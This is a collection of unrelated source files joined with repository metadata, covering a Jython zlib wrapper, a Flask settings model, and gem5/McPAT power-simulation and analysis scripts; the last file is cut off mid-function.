def flush(self, length=None):
# FIXME close input streams if gzip
if self._ended:
raise error("decompressobj may not be used after flush()")
if length is None:
length = 0
elif length <= 0:
raise ValueError('length must be greater than zero')
last = _get_inflate_data(self.inflater, length)
self.inflater.end()
return last
def _to_input(string):
return string.tostring() if isinstance(string, array.array) else string
def _get_deflate_data(deflater):
buf = jarray.zeros(1024, 'b')
s = StringIO()
while not deflater.finished():
l = deflater.deflate(buf)
if l == 0:
break
s.write(String(buf, 0, 0, l))
s.seek(0)
return s.read()
def _get_inflate_data(inflater, max_length=0):
buf = jarray.zeros(1024, 'b')
s = StringIO()
total = 0
while not inflater.finished():
try:
if max_length:
l = inflater.inflate(buf, 0, min(1024, max_length - total))
else:
l = inflater.inflate(buf)
except DataFormatException as e:
raise error(str(e))
if l == 0:
break
total += l
s.write(String(buf, 0, 0, l))
if max_length and total == max_length:
break
s.seek(0)
return s.read()
FTEXT = 1
FHCRC = 2
FEXTRA = 4
FNAME = 8
FCOMMENT = 16
def _skip_gzip_header(string):
# per format specified in http://tools.ietf.org/html/rfc1952
# could we use bytearray instead?
s = array.array("B", string)
id1 = s[0]
id2 = s[1]
# Check gzip magic
if id1 != 31 or id2 != 139:
return string
cm = s[2]
flg = s[3]
mtime = s[4:8]
xfl = s[8]
os = s[9]
# skip fixed header, then figure out variable parts
s = s[10:]
if flg & FEXTRA:
# skip extra field
xlen = s[0] + s[1] * 256 # MSB ordering
s = s[2 + xlen:]
if flg & FNAME:
# skip filename
s = s[s.find("\x00")+1:]
if flg & FCOMMENT:
# skip comment
s = s[s.find("\x00")+1:]
if flg & FHCRC:
# skip CRC16 for the header - might be nice to check of course
s = s[2:]
return s.tostring()
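# --- Hypothetical round-trip sketch (requires a Jython runtime, since this
# module wraps java.util.zip); payload and level values are illustrative:
#   packed = compress("hello zlib on jython", 9)
#   assert decompress(packed) == "hello zlib on jython"
#   c, d = compressobj(6), decompressobj()
#   assert d.decompress(c.compress("streamed data") + c.flush()) == "streamed data"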
``` |
{
"source": "jimmyzang/flask_book",
"score": 2
} |
#### File: app/models/site.py
```python
from app.models.model import *
#from sqlalchemy.dialects.mysql import LONGTEXT
from sqlalchemy.dialects.sqlite import TEXT
PREFIX = "site_"
class SiteMeta(db.Model):
""" Site table """
__tablename__ = db.PREFIX + PREFIX + "meta"
__table_args__ = {
"mysql_engine": "InnoDB",
"mysql_charset": "utf8"
}
id = db.Column(db.Integer, primary_key = True, nullable = False)
name = db.Column(db.String(255), nullable = False, index = True)
value = db.deferred(db.Column(TEXT, default="", nullable = False))
@staticmethod
def add(data):
for name, value in data.items():
meta = SiteMeta.query.filter_by(name=name).first()
if meta is not None:
continue
meta = SiteMeta(name=name, value=value)
db.session.add(meta)
db.session.commit()
@staticmethod
def setting(data):
for name, value in data.items():
meta = SiteMeta.query.filter_by(name=name).first()
if not meta:
meta = SiteMeta(name=name, value=value)
db.session.add(meta)
return
meta.value = value
db.session.commit()
@staticmethod
def all():
return SiteMeta.query.all()
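# --- Hypothetical usage sketch (assumes an active Flask application context
# and the SQLAlchemy `db` instance from app.models.model; the key names are
# illustrative only):
#   SiteMeta.add({"site_name": "demo"})        # insert defaults, skip existing rows
#   SiteMeta.setting({"site_name": "renamed"}) # create or update a single entry
#   values = {m.name: m.value for m in SiteMeta.all()}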
``` |
{
"source": "JimmyZhang12/gem5",
"score": 2
} |
#### File: m5/mcpat/util.py
```python
import os
import sys
import re
import pickle
import subprocess
import math
from file_read_backwards import FileReadBackwards
from collections import defaultdict
from m5.SimObject import SimObject
from m5.util import fatal
from m5.params import *
from node import Node
from device import Device
from epoch import Epoch
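# parse_output() turns a plain-text McPAT report into an Epoch: strip_header
# drops everything before the "Processor:" section, strip_space normalizes the
# indentation McPAT emits, split_list breaks the report into per-component
# chunks (renaming each "Core:" heading to "Core<N>:"), and to_devices converts
# every chunk into a Device whose depth is derived from its indentation.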
def parse_output(output_file):
def strip_header(lines):
start = False
ret = []
for line in lines:
if("Processor:" in line):
start = True
if start:
ret.append(line)
return ret
def strip_space(lines):
ret = []
last_line_star = False
start_core = False
for line in lines:
if "Core:" in line:
start_core = True
if last_line_star:
#Fix spacing after ******
ret.append(" "+line)
last_line_star = False
elif "*****" in line:
last_line_star = True
elif "Device Type=" in line or " Local Predictor:" in line:
continue
else:
if last_line_star:
#Fix spacing after ******
ret.append(" "+line)
last_line_star = False
elif start_core:
ret.append(line.replace(" ", "", 2))
else:
ret.append(line)
return ret
def line_to_dict(line):
ret = {}
temp = line.split(":")[0].split("=")
ret["lspace"] = len(temp[0]) - len(temp[0].lstrip())
return ret
def split_list(lines):
core_id = 0
ret = []
sub = []
for i in lines:
if "Core:" in i:
i = i.replace("Core:", "Core"+str(core_id)+":")
core_id += 1
if i == "\n":
ret.append(sub)
sub = []
else:
sub.append(i.rstrip())
return ret
def to_devices(intermediate_dev_list):
ret = []
for dev in intermediate_dev_list:
data = {}
#print(dev)
for attr in dev[1:]:
data[attr.split("=")[0].strip()] = attr.split("=")[1].strip()
ret.append(Device(dev[0].split(":")[0].strip(), data, \
int(math.floor((len(dev[0]) - len(dev[0].lstrip()))/2))))
if ret[-1].depth == 4:
ret[-1].depth = 3
if ret[-1].depth == 5:
ret[-1].depth = 3
if ret[-1].depth == 6:
ret[-1].depth = 4
return ret
""" Returns an Epochs """
with open(output_file, "r") as of:
lines = of.readlines()
lines = strip_header(lines)
lines = strip_space(lines)
temp = split_list(lines)
dev_list = to_devices(temp)
epoch = Epoch(dev_list)
return epoch
#first time running mcpat?
first_time = True
def run_mcpat(xml, print_level, opt_for_clk, ofile, errfile):
global first_time
from m5 import options
mcpat_output_path = os.path.join(options.mcpat_out,
options.mcpat_testname)
mcpat_exe = os.path.join(options.mcpat_path, "mcpat")
mcpat_serial = os.path.join(mcpat_output_path, "mcpat_serial.txt")
#if first time first generate a checkpoint before mcpat calculation
if(first_time):
mcpat = [mcpat_exe,
"-i",
xml,
"-p",
"5",
"--serial_create=true",
"--serial_file="+mcpat_serial]
first_time = False
# print("FIRSTIME")
# print(" ".join(mcpat))
# print(mcpat)
with open(ofile, "w") as ostd, open(errfile, "w") as oerr:
p = subprocess.Popen(mcpat, stdout=ostd, stderr=oerr)
p.wait()
mcpat = [mcpat_exe,
"-i",
xml,
"-p",
"5",
"--serial_restore=true",
"--serial_file="+mcpat_serial]
with open(ofile, "w") as ostd, open(errfile, "w") as oerr:
p = subprocess.Popen(mcpat, stdout=ostd, stderr=oerr)
p.wait()
def get_data(path, mcpat_trees):
data = {}
def filter(value):
if "nan" in value.split(" ")[0] or "inf" in value.split(" ")[0]:
# McPAT Messed Up?
return "0"
else:
return value.split(" ")[0]
for key, value in mcpat_trees[-1].find(path).data.items():
data[key] = filter(value.split(" ")[0])
return data
def calc_total_power(data, power_gating = False, scale_factor=1.0):
# Add Runtime Dynamic to Gate Leakage and Subthreshold Leakage with Power
# Gating
print("calc_total_power=",power_gating)
print("gate leakage ", float(data["Gate Leakage"]))
print("Subthreshold Leakage with power gating ", float(data["Subthreshold Leakage with power gating"]))
print("Runtime Dynamic ", float(data["Runtime Dynamic"]))
print("sum ", float(data["Gate Leakage"]) + \
float(data["Subthreshold Leakage with power gating"]) + \
float(data["Runtime Dynamic"])*scale_factor)
if power_gating:
return (float(data["Gate Leakage"]) + \
float(data["Subthreshold Leakage with power gating"]) + \
float(data["Runtime Dynamic"]))*scale_factor
return (float(data["Gate Leakage"]) + \
float(data["Subthreshold Leakage"]) + \
float(data["Runtime Dynamic"]))*scale_factor
def calc_req(power, voltage):
return voltage*voltage/power
def dump_stats(mcpat_trees):
''' Dumps the tree data to csv '''
from m5 import options
mcpat_output_path = os.path.join(options.mcpat_out,
options.mcpat_testname)
testname = options.mcpat_testname
cfile = os.path.join(mcpat_output_path, testname+"_all.csv")
sfile = os.path.join(mcpat_output_path, testname+".csv")
with open(sfile, "w") as csv, \
open(cfile, "w") as full_dump:
i = 0
# Print the header line:
mcpat_trees[0].print_csv_line_header(full_dump)
# Print the header line:
for epoch in mcpat_trees:
epoch.print_csv_line_data(full_dump)
data = get_data("Processor", mcpat_trees)
# Calculate Total Power:
power = calc_total_power(data)
data = []
req = calc_req(power, 1.0)
data.append(str(i*float(options.power_profile_interval)))
data.append(str(req))
data.append(str(power))
csv.write(",".join(data)+"\n")
i+=1
```
#### File: m5/vpi_shm/__init__.py
```python
import math
import os
import sys
import re
import subprocess
import math
from threading import Thread
from time import sleep
import _m5.vpi_shm as vpi
thread = None
valid_pdn_types = ["HARVARD", "HARVARD_M", "HARVARD_L",
"HARVARD_D", "ARM", "INTEL_M", "INTEL_DT"]
def initialize(name):
from m5 import options
pdn_type = options.power_supply_type
if pdn_type not in valid_pdn_types:
pdn_types = ",".join(valid_pdn_types)
print("Error, Invalid PDN Type: \""+
pdn_type+"\", must be of type: "+pdn_types)
sys.exit(1)
time_to_next = str(vpi.get_time_to_next())+"p"
global thread
""" This function will launch the docker container for the verilog
simulation. """
def run_command(command):
process = subprocess.Popen(command, stdout=subprocess.PIPE)
while True:
output = process.stdout.readline()
if output == '' and process.poll() is not None:
break
#if output:
#print(output.strip(), flush=True)
rc = process.poll()
return rc
def verilog_thread(name, pdn_type, ttn):
""" This is the thread function for executing the verilog sim """
run_command([os.path.join(options.ncverilog_path,"run_cadence.sh"), \
name, pdn_type, ttn])
if os.path.exists(os.path.join("/dev/shm", name)):
os.remove(os.path.join("/dev/shm", name))
thread = Thread(target=verilog_thread, args=[name, pdn_type, \
time_to_next])
thread.setDaemon(True)
thread.start()
# Wait for the container to launch and the sim to run
while not os.path.isfile(os.path.join("/dev/shm", name)):
sleep(1)
vpi.create_shm(0, name)
return
def set_driver_signals(load, term_sim, i=0):
vpi.set_driver_signals(load, term_sim, i)
def get_voltage():
return vpi.get_voltage()
def get_current():
return vpi.get_current()
def ack_supply():
return vpi.ack_supply()
def mp_get_freq(i = 0):
return vpi.mp_get_freq(i)
def mp_get_voltage_set(i = 0):
return vpi.mp_get_voltage_set()
def mp_get_ncores():
return vpi.mp_get_ncores()
def stop():
subprocess.Popen(['reset']).wait()
``` |
{
"source": "JimmyZhang12/predict-T",
"score": 2
} |
#### File: deprecated/analysis/i_plot_mc.py
```python
import pandas as pd
import glob
import numpy as np
import math
import sys
import matplotlib.pyplot as plt
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--input', type=str, default="", help="input path")
parser.add_argument('--warmup', type=int, default=1, help="time in nanoseconds of the warmup")
args = parser.parse_args()
def get_files(path):
files = glob.glob(path+"/*.csv")
files = [i for i in files]
files.sort()
return files
def get_names(files):
names = []
for file in files:
if "SMALL" in file:
names.append("SMALL")
if "MEDIUM" in file:
names.append("MEDIUM")
if "LARGE" in file:
names.append("LARGE")
return names
files = get_files(args.input)
names = get_names(files)
print(files)
print(names)
apps = []
times = []
stat_to_plt = "iout"
for file in files[0:2]:
c_title="time,vin,va,vb,vout,_vout_mean,vout_mean,iin,iout,proc_load,enable,prediction,ttn,rt"
df= pd.read_csv(file, header=None, names=c_title.split(","))
apps.append([i for i in np.array(df[stat_to_plt][args.warmup:])])
times.append([i/1000 for i in np.array(df["time"][args.warmup:])])
print(len(times[-1]), len(apps[-1]))
print(len(apps),len(times))
fig, axs = plt.subplots(1, 1, tight_layout=True)
fig.set_size_inches(8,4)
for i, t, n in zip(apps, times, names):
axs.plot(t, i, linewidth=1, label=n)
axs.legend()
#axs.set_yticks(np.arange(0.70,1.10,0.05))
axs.set_xlabel("Time (ns)")
#axs.set_ylabel("Vout (V)")
axs.set_ylabel("Idevice (A)")
fig.suptitle("Device Current Swaptions 8c/8t Harvard PDN")
plt.show()
```
#### File: deprecated/avp_ideal_model/supply.py
```python
class Supply:
vid = 0
v_bulk = 0
v_proc = 0
i_inst = 0
proc_max_i = 0
proc_min_i = 0
proc_max_v = 0
proc_min_v = 0
rpdn = 0
rll = 0
def __init__(self, rpdn, rll, vcc_max, vcc_min, imax, imin):
self.rpdn = rpdn
self.rll = rll
self.proc_max_i = imax
self.proc_min_i = imin
self.proc_max_v = vcc_max
self.proc_min_v = vcc_min
self.vid = vcc_min + rll*imax
def get_i(self):
return self.i_inst
def get_v(self):
return self.v_bulk
def get_v_proc(self):
return self.v_proc
def get_p(self):
return self.i_inst*self.v_bulk
def tick(self, i_proc):
self.i_inst = i_proc
self.v_proc = self.vid - self.rll*self.i_inst
self.v_bulk = self.v_proc + self.rpdn*self.i_inst
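# --- Hypothetical tick-by-tick use of the AVP model (parameter values below are
# illustrative only, not taken from any datasheet):
#   vr = Supply(rpdn=0.5e-3, rll=1.25e-3, vcc_max=1.1, vcc_min=0.9, imax=160, imin=5)
#   vr.tick(100.0)                           # apply a 100 A processor load
#   vr.get_v_proc(), vr.get_v(), vr.get_p()  # die voltage, bulk voltage, power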
```
#### File: python/deprecated/gem5.py
```python
import os
import sys
import re
import subprocess
import tempfile
from contextlib import contextmanager
# Gem5 Global Paths:
gem5_path = "../gem5"
gem5_exe_arm = os.path.join(gem5_path, "build/ARM/gem5.opt")
gem5_exe_x86 = os.path.join(gem5_path, "build/X86/gem5.opt")
gem5_cfg = os.path.join(gem5_path, "configs/example/se.py")
test_path = "testbin"
def get_stats_file(gem5_out):
return os.path.join(gem5_out, "stats.txt")
def get_config_file(gem5_out):
return os.path.join(gem5_out, "config.ini")
def run_gem5(cmd, opts, outname, outdir, cpu_type, mcpat_template, mcpat_path, mcpat_out, mcpat_testname, ps):
global gem5_path
global gem5_exe
global gem5_cfg
global gem5_out
if cpu_type == "ARM":
gem5 = [gem5_exe_arm,
"--outdir="+os.path.join(".", outdir),
"--mcpat_template="+mcpat_template,
"--mcpat_path="+mcpat_path,
"--mcpat_out="+mcpat_out,
"--mcpat_testname="+mcpat_testname,
"--power_profile_start=400000000",
"--power_profile_duration=2000",
"--power_profile_interval=1000",
gem5_cfg,
"--cmd="+os.path.join(test_path, cmd),
"--options="+opts,
"--power_profile_interval=1000",
"--num-cpus=1",
"--cpu-type=DerivO3CPU",
"--l1i_size=16kB",
"--l1d_size=64kB",
"--l2cache",
"--l2_size=256kB",
"--caches",
"--mem-size=8GB"]
if cpu_type == "XeonE7-8893":
gem5 = [gem5_exe_x86,
"--outdir="+os.path.join(".", outdir),
"--mcpat_template="+mcpat_template,
"--mcpat_path="+mcpat_path,
"--mcpat_out="+mcpat_out,
"--mcpat_testname="+mcpat_testname,
"--power_profile_start=4000000",
"--power_profile_duration=1000",
"--power_profile_interval=500",
"--ncverilog_path="+ps,
gem5_cfg,
"--cmd="+os.path.join(test_path, cmd),
"--options="+opts,
"--power_profile_interval=500",
"--num-cpus=1",
"--cpu-type=DerivO3CPU",
"--l1i_size=16kB",
"--l1i-hwp-type=TaggedPrefetcher",
"--l1d_size=64kB",
"--l1d-hwp-type=TaggedPrefetcher",
"--l2cache",
"--num-l2caches=1",
"--l2_size=256kB",
"--l2-hwp-type=TaggedPrefetcher",
"--l3cache",
"--l3_size=32MB",
"--l3-hwp-type=TaggedPrefetcher",
"--caches",
"--sys-clock=2GHz",
"--mem-size=8GB"]
if cpu_type == "Simple":
gem5 = [gem5_exe_x86,
"--outdir="+os.path.join(".", outdir),
"--mcpat_disable",
gem5_cfg,
"--cmd="+os.path.join(test_path, cmd),
"--options="+opts,
"--num-cpus=1",
"--cpu-type=AtomicSimpleCPU",
"--l1i_size=16kB",
"--l1d_size=64kB",
"--l2cache",
"--l2_size=256kB",
"--caches",
"--mem-size=8GB"]
print(" ".join(gem5))
with open(os.path.join(".", outname+".out"), "w") as ostd, \
open(os.path.join(".", outname+".err"), "w") as oerr:
p = subprocess.Popen(gem5, stdout=ostd, stderr=oerr)
p.wait()
#out, err = p.communicate()
#print(out)
# --list-hwp-types: TaggedPrefetcher, BOPPrefetcher, StridePrefetcher ...
# --list-bp-types: localbp, BiModeBP, TAGE, LTAGE, MultiperspectivePerceptron....
#"--power_profile_start=400000000",
#Test Code:
#print(get_stats_file("fft_small"))
#print(get_config_file("fft_small"))
#run_gem5("fft", "4 4096", "fft_small", "1", "DerivO3CPU", "16kB", "64kB", "256kB")
#../gem5/build/ARM/gem5.opt --outdir=./output/fft_small ../gem5/configs/example/se.py --cmd=tests/testbin/fft --options='4 4096' --num-cpus=1 --cpu-type=DerivO3CPU --l1i_size=16kB --l1d_size=64kB --l2cache --l2_size=256kB --cach
```
#### File: deprecated/square_wave/square_wave.py
```python
import os
import sys
import re
import subprocess
import tempfile
import math
import argparse
import numpy as np
from progressbar import AnimatedMarker, Bar, BouncingBar, Counter, ETA, \
FileTransferSpeed, FormatLabel, Percentage, \
ProgressBar, ReverseBar, RotatingMarker, \
SimpleProgress, Timer
parser = argparse.ArgumentParser()
parser.add_argument('--outpath', type=str, default="", help="output path")
parser.add_argument('--duty', type=str, default="0.5", help="duty cycle")
parser.add_argument('--device', type=str, default="server", help="")
args = parser.parse_args()
if(args.device == "server"):
period = [20e-9, 100e-9, 200e-9, 1e-6, 2e-6, 10e-6, 20e-6, 100e-6]
slew_rate = list(np.arange(0.01, 0.3, 0.05))
amplitude = [25,50,95]
duration=500e-6
timestep=1e-9
min_power = 5
if(args.device == "laptop"):
period = [200e-9, 1e-6, 2e-6, 10e-6, 20e-6, 100e-6]
slew_rate = list(np.arange(0.01, 0.3, 0.05))
amplitude = [10,25,50]
duration=500e-6
timestep=1e-9
min_power = 1
if(args.device == "mobile"):
period = [200e-9, 1e-6, 2e-6, 10e-6, 20e-6, 100e-6]
slew_rate = list(np.arange(0.01, 0.3, 0.05)/(2000/3000))
amplitude = [1,3,5]
duration=500e-6
timestep=1e-9
min_power = 0.1
if(args.device == "embedded"):
period = [200e-9, 1e-6, 2e-6, 10e-6, 20e-6, 100e-6]
slew_rate = list(np.arange(0.01, 0.3, 0.05)/(1500/3000))
amplitude = [0.5,1,2]
duration=500e-6
timestep=1e-9
min_power = 0.1
if(args.device == "perf_uc"):
period = [200e-9, 1e-6, 2e-6, 10e-6, 20e-6, 100e-6]
slew_rate = list(np.arange(0.01, 0.3, 0.05)/(120/3000))
amplitude = [0.05,0.1,0.15]
duration=500e-6
timestep=1e-9
min_power = 0.01
if(args.device == "lp_uc"):
period = [200e-9, 1e-6, 2e-6, 10e-6, 20e-6, 100e-6]
slew_rate = list(np.arange(0.01, 0.3, 0.05)/(10/3000))
amplitude = [0.003,0.005,0.010]
duration=500e-6
timestep=1e-9
min_power = 0.001
outpath = args.outpath
duty = float(args.duty)
def increase_power(power, max_power, slew_rate):
return min(max_power, power+slew_rate)
def decrease_power(power, min_power, slew_rate):
return max(min_power, power-slew_rate)
def calc_req(power, voltage):
return voltage*voltage/power
def arg_check(period, slew_rate, min_power, peak_power, timestep, duration, outpath, per_idx, sl_idx, amp_idx):
time = 0
half_p = period/2;
power = min_power
min_rr = 2e-5
max_rr = 5e-6
if (((peak_power - min_power)/slew_rate)/1e9 > min(duty*period, (1-duty)*period)):
return False
if(period < max_rr and (peak_power - min_power) > 25):
return False
if(period < min_rr and (peak_power - min_power) > (2e-5/period)*100):
return False
return True
def trace(period, slew_rate, min_power, peak_power, timestep, duration, outpath, per_idx, sl_idx, amp_idx):
time = 0
half_p = period/2;
power = min_power
min_rr = 2e-5
max_rr = 5e-6
if (((peak_power - min_power)/slew_rate)/1e9 > min(duty*period, (1-duty)*period)):
return False
if(period < max_rr and (peak_power - min_power) > 25):
return False
if(period < min_rr and (peak_power - min_power) > (2e-5/period)*100):
return False
outname = "trace_"+str(per_idx)+"_"+str(sl_idx)+"_"+str(amp_idx)+".csv"
outfile = os.path.join(outpath,outname)
with open(outfile, "w") as of:
time = 0
power = min_power
while(time < duration):
# Start with off:
t1 = time
while(time < t1 + (1-duty)*period):
power = decrease_power(power, min_power, slew_rate)
res = calc_req(power, 1.0)
of.write(",".join([str(time),str(res),str(power)])+"\n")
time += timestep
t1 = time
while(time < t1 + duty*period):
power = increase_power(power, peak_power, slew_rate)
res = calc_req(power, 1.0)
of.write(",".join([str(time),str(res),str(power)])+"\n")
time += timestep
return True
total = len(period)*len(slew_rate)*len(amplitude)
total = 0
for i in range(len(period)):
for j in range(len(slew_rate)):
for k in range(len(amplitude)):
if(arg_check(period[i], slew_rate[j], min_power, min_power+amplitude[k], timestep, duration, outpath, i, j, k)):
total += 1
pbar = ProgressBar(widgets=[Percentage(), Bar(), ETA()], maxval=total).start()
total = 0
for i in range(len(period)):
for j in range(len(slew_rate)):
for k in range(len(amplitude)):
if(trace(period[i], slew_rate[j], min_power, min_power+amplitude[k], timestep, duration, outpath, i, j, k)):
total += 1
pbar.update(total)
pbar.finish()
```
#### File: deprecated/front_end_preds/supply_voltage_over_cycles_backend.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
class Cycle_Dump:
def __init__(self):
self.ve_count = 0
self.action_count = 0
return
def reset(self):
self.ve_flag = False
self.ve_flag_prev = []
self.action_flag = False
self.cycle = None
self.supply_curr = None
self.supply_volt = None
self.pred_state = None
self.numCycles_var = None
return
def num_voltage_emergency(self, line):
linespl = line.split()
ve_read = int(linespl[1])
if ve_read > self.ve_count:
self.ve_count = ve_read
self.ve_flag = True
return
def total_action(self, line):
linespl = line.split()
action_read = int(linespl[1])
if action_read > self.action_count:
self.action_count = action_read
self.action_flag = True
return
def counter(self, line):
linespl = line.split()
self.cycle = int(linespl[1])
return
def state(self, line):
linespl = line.split()
self.pred_state = int(linespl[1])
return
def supply_current(self, line):
linespl = line.split()
self.supply_curr = float(linespl[1])
return
def supply_voltage(self, line):
linespl = line.split()
self.supply_volt = float(linespl[1])
return
def numCycles(self,line):
linespl = line.split()
self.numCycles_var = int(linespl[1])
return
#PARAMETERS
HOME = os.environ['HOME']
PREDICTOR = 'HarvardPowerPredictor_1'
CLASS = 'DESKTOP'
TEST = 'crc'
path = HOME + '/output_11_6/gem5_out/' + CLASS + '_' + PREDICTOR + '/' + TEST + '.txt'
print(path)
#PARAMETERS
stats = open(path, 'r')
fig = plt.figure(figsize=(50,5))
ax = plt.axes()
fig.suptitle('Supply Voltage Over Time' + '(' + PREDICTOR + ', ' + CLASS + ', ' + TEST + ' )', fontsize=14)
ax.set_xlabel('Cycle', fontsize=14)
ax.set_ylabel('Supply Voltage', fontsize=14)
ax2 = ax.twinx()
ax2.set_ylabel('Current', color='tab:blue') # we already handled the x-label with ax1
voltage = [0]
current =[0]
# read line by line
line = stats.readline()
line = stats.readline()
cycle_dump = Cycle_Dump()
while line:
cycle_dump.reset()
while(True):
#one cycle worth of stat dumps
if 'Begin Simulation Statistics' in line or not line:
break
stat_name = line.split()[0].split('.')[-1].split(':')[0]
func = getattr(cycle_dump, stat_name, False)
if func:
func(line)
line = stats.readline()
for _ in range(cycle_dump.numCycles_var):
voltage.append(None)
current.append(None)
#implicit assumption stat dumps are every 2 cycles
voltage[-1] = cycle_dump.supply_volt
current[-1] = cycle_dump.supply_curr
voltage[-2] = (voltage[-1]+voltage[-3])/2
current[-2] = (current[-1]+current[-3])/2
if cycle_dump.ve_flag:
ax.axvspan(len(voltage), len(voltage)+1, color='blue', alpha=0.15)
#if cycle_dump.action_flag:
# ax.axvspan(len(voltage), len(voltage)+1, color='red', alpha=0.3)
line = stats.readline()
xvar = np.linspace(0,len(voltage),len(voltage))
start_cycle = 8000
end_cycle = 17000
ax.plot(xvar, voltage,color='black', linewidth=1.0)
ax.set_ylim(bottom = min(i for i in voltage if i > 0.8), top = max(voltage))
ax2.plot(xvar, current, color='tab:blue')
ax2.tick_params(axis='y', labelcolor='tab:blue')
ax2.set_ylim([min(i for i in current if i > 0.8), max(current)])
plt.xlim(left = start_cycle, right = end_cycle)
plt.savefig(HOME +'/plot/11-3_Supply_Volt+Curr_Over_Time' + '_' + PREDICTOR + '_' + CLASS + '_' + TEST +'_0.5.png', dpi=300)
```
#### File: deprecated/front_end_preds/util.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from enum import Enum
from collections import deque, defaultdict
class PDN:
def __init__(self, L, C, R, VDC, CLK):
self.L = L
self.C = C
self.R = R
self.VDC = VDC
self.CLK = CLK
self.vout_2_cycle_ago = VDC
self.vout_1_cycle_ago = VDC
self.iout_1_cycle_ago = 0
def get_curr(self, current):
ts = 1/self.CLK
LmulC = self.L*self.C
LdivR = self.L/self.R
vout = self.VDC*ts**2/(LmulC) \
+ self.vout_1_cycle_ago*(2 - ts/(LdivR)) \
+ self.vout_2_cycle_ago*(ts/(LdivR) \
- 1 - ts**2/(LmulC)) \
- current*self.R*ts**2/(LmulC) \
- (1/self.C)*ts*(current - self.iout_1_cycle_ago)
self.vout_2_cycle_ago = self.vout_1_cycle_ago
self.vout_1_cycle_ago = vout
self.iout_1_cycle_ago = current
return vout
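# --- Minimal sketch of stepping the RLC model above (the L/C/R and load values
# are illustrative; get_curr takes the instantaneous current and returns the
# simulated supply voltage for that cycle):
#   pdn = PDN(L=20e-12, C=1.32e-06, R=3.2e-3, VDC=1.4, CLK=4E9)
#   volts = [pdn.get_curr(power / pdn.VDC) for power in (10.0, 30.0, 30.0, 10.0)]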
class Events(Enum):
NO_EVENT = 1
BRANCH_T = 2
BRANCH_NT = 3
BRANCH_MP = 4
FETCH = 5
TLB_STALL = 6
ICACHE_STALL = 7
COMMIT_BLOCK = 8
IQ_FULL = 9
LSQ_FULL = 10
LOAD_EX = 11
LOAD_WB = 12
LOAD_CFETCH = 13
STORE_EXECUTE = 14
STORE_WB = 15
INSTR_DISPATCH = 16
INSTR_ISSUE = 17
INSTR_EXECUTE = 18
INSTR_COMMIT = 19
MEM_MP = 20
EMPTY_EVENT = 21
DUMMY_EVENT2 = 22
#from other stats
DCACHE_MISS = 23
ICACHE_MISS = 24
L2_MISS = 25
    TLB_MISS = 26
class Cycle_Dump:
event_map = {
#from new_events_stats
0:'NO_EVENT',
1:'BRANCH_T',
2:'BRANCH_NT',
3:'BRANCH_MP',
4:'FETCH',
5:'TLB_STALL',
6:'ICACHE_STALL',
7:'COMMIT_BLOCK',
8:'IQ_FULL',
9:'LSQ_FULL',
10:'LOAD_EX',
11:'LOAD_WB',
12:'LOAD_CFETCH',
13:'STORE_EXECUTE',
14:'STORE_WB',
15:'INSTR_DISPATCH',
16:'INSTR_ISSUE',
17:'INSTR_EXECUTE',
18:'INSTR_COMMIT',
19:'MEM_MP',
20:'EMPTY_EVENT',
21:'DUMMY_EVENT2',
#from other stats
22:'DCACHE_MISS',
23:'ICACHE_MISS',
24:'L2_MISS',
25:'TLB_MISS',
}
new_events_blacklist = {
0:'NO_EVENT',
20:'EMPTY_EVENT',
21:'DUMMY_EVENT2',
}
def __init__(self, stats):
self.ve_count = 0
self.action_count = 0
self.stats = stats
self.stats.readline()
self.stats.readline()
self.new_events_var = [] #list of new events the current cycle
self.new_events_prev_var = [] #list of new events the previous cycle of the cycle dump
self.table_index_count = 0
self.cycle = None
self.supply_curr = None
self.supply_volt = None
self.supply_volt_prev = None
self.anchorPC_var = None
self.numCycles_var = None
self.branchMispredicts_count = 0
self.memOrderViolationEvents_count = 0
self.DcacheMisses_count = 0
self.IcacheMisses_count = 0
self.TLBcacheMisses_count = 0
self.L2cacheMisses_count = 0
keys = self.event_map.keys()
self.event_count = {k: 0 for k in keys}
self.EOF = False
def reset(self):
for e in self.new_events_var:
self.event_count[e] += 1
self.new_events_var = [] #list of new events the current cycle
self.new_events_prev_var = [] #list of new events the previous cycle of the cycle dump
self.table_index_count = 0
self.cycle = None
self.supply_curr = None
self.supply_volt = None
self.supply_volt_prev = None
self.anchorPC_var = None
self.numCycles_var = None
return
def new_events(self,line):
linespl = line.split()
event = int(linespl[1])
if (not event in self.new_events_blacklist.keys()) and (event not in self.new_events_var):
self.new_events_var.append(event)
return
# # def new_events_prev(self,line):
# # linespl = line.split()
# # event = int(linespl[1])
# # if event != 20:
# # self.event_count[event] += 1
# # self.new_events_prev_var.append(event)
# return
def counter(self, line):
linespl = line.split()
self.cycle = int(linespl[1])
return
def supply_current(self, line):
linespl = line.split()
self.supply_curr = float(linespl[1])
return
def supply_voltage(self, line):
linespl = line.split()
self.supply_volt = float(linespl[1])
return
def anchorPC(self, line):
linespl = line.split()
self.anchorPC_var = hex(int(linespl[1]))
return
def numCycles(self,line):
linespl = line.split()
self.numCycles_var = int(linespl[1])
return
# def branchMispredicts(self,line):
# linespl = line.split()
# val = int(linespl[1])
# if val > self.branchMispredicts_count:
# self.branchMispredicts_count = val
# self.new_events_var.append(3) #normally enum but its 2am
# def memOrderViolationEvents(self,line):
# linespl = line.split()
# val = int(linespl[1])
# if val > self.memOrderViolationEvents_count:
# self.memOrderViolationEvents_count = val
# self.new_events_var.append(8) #normally enum but its 2am
def overall_misses(self,line):
linespl = line.split()
val = int(linespl[1])
cache = line.split()[0].split('.')[-2]
if (cache == 'l2'):
if val > self.L2cacheMisses_count:
self.L2cacheMisses_count = val
self.new_events_var.append(24) #normally enum but its 2am
if (cache == 'dcache'):
if val > self.DcacheMisses_count:
self.DcacheMisses_count = val
self.new_events_var.append(22) #normally enum but its 2am
if (cache == 'icache'):
if val > self.IcacheMisses_count:
self.IcacheMisses_count = val
self.new_events_var.append(23) #normally enum but its 2am
if (cache == 'itb_walker_cache' or cache == 'dtb_walker_cache'):
if val > self.TLBcacheMisses_count:
self.TLBcacheMisses_count = val
self.new_events_var.append(25) #normally enum but its 2am
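    # parseCycle() consumes one stats-dump block from the gem5 stats file,
    # dispatching each line to the same-named method on this class via getattr
    # (e.g. supply_voltage, numCycles, overall_misses); it returns True once
    # the file is exhausted and False at the end of each block.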
def parseCycle(self):
while(True):
line = self.stats.readline()
if not line:
return True
#end of 1 cycle of stat dump
elif (not line.upper().isupper()):
for _ in range(4):
self.stats.readline()
if not line:
return True
return False
else:
#one cycle worth of stat dumps
